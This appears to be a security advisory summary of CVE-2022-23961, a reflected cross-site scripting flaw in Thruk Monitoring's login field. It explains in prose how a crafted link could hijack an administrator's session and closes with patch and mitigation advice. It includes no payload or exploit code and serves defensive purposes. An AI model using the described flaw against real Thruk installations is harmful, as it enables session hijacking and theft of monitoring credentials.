Thruk Monitoring XSS Flaw CVE-2022-23961 Lets Attackers Hijack

Executive Summary

A reflected cross-site scripting (XSS) vulnerability in Thruk Monitoring, identified as CVE-2022-23961 with a CVSS score of 6.1, allows unauthenticated remote attackers to inject arbitrary JavaScript into the login page. The flaw affects all versions of Thruk through 2.46.3, a widely used web-based interface for Nagios and other monitoring systems. According to an advisory published by the German security firm usd AG, the vulnerability resides in the login field of the authentication form, where user-supplied input is not properly sanitized before being reflected in the server's response. An attacker can craft a malicious link that, when clicked by an authenticated administrator, executes JavaScript in the context of the Thruk session, potentially leading to session hijacking, credential theft, or further compromise of the monitoring infrastructure.

Technical Analysis

The vulnerability exists in the login form of Thruk Monitoring versions up to and including 2.46.3. The login field accepts user input and reflects it directly into the HTML response without adequate encoding or sanitization. This enables a reflected XSS attack: an unauthenticated attacker can craft a URL containing a malicious payload in the login parameter and trick a victim—typically an administrator or operator—into clicking it. When the victim's browser renders the login page, the injected script executes in the same origin as the Thruk application, granting it access to session cookies, local storage, and the ability to perform actions on behalf of the authenticated user.

The advisory from usd AG (HeRoLab) provides no proof-of-concept code but confirms the attack vector is remote, requires no authentication, and targets the login form's input field. The CVSS 6.1 score reflects a medium severity, driven by the need for user interaction (the victim must click the link) and the network-based attack vector. However, the impact is elevated by Thruk's role in centralized monitoring: a compromised Thruk session can expose sensitive infrastructure data, including host configurations, service states, and credentials stored in monitoring plugins.

Thruk is a Perl-based application that provides a unified web interface for Nagios, Icinga, Shinken, and other monitoring backends. It is commonly deployed in enterprise environments and managed service providers (MSPs) to aggregate alerts and dashboards. The login field vulnerability is particularly concerning because it can be exploited without any prior access to the system, and the reflected script runs with the privileges of the authenticated user who clicks the link.

Mitigations & Recommendations

Users of Thruk Monitoring should upgrade to version 2.46.4 or later, which includes a fix for CVE-2022-23961. The Thruk project has released patched versions that properly encode user input in the login form. For organizations unable to upgrade immediately, administrators should implement web application firewall (WAF) rules that block reflected XSS payloads in login parameters, enforce strict Content Security Policy (CSP) headers on the Thruk interface, and educate users about the risks of clicking unsolicited links. Additionally, monitoring logs for unusual login URL patterns—especially those containing script tags or encoded JavaScript—can help detect exploitation attempts. Given the sensitivity of monitoring dashboards, isolating the Thruk interface behind a VPN or bastion host reduces exposure to external attackers.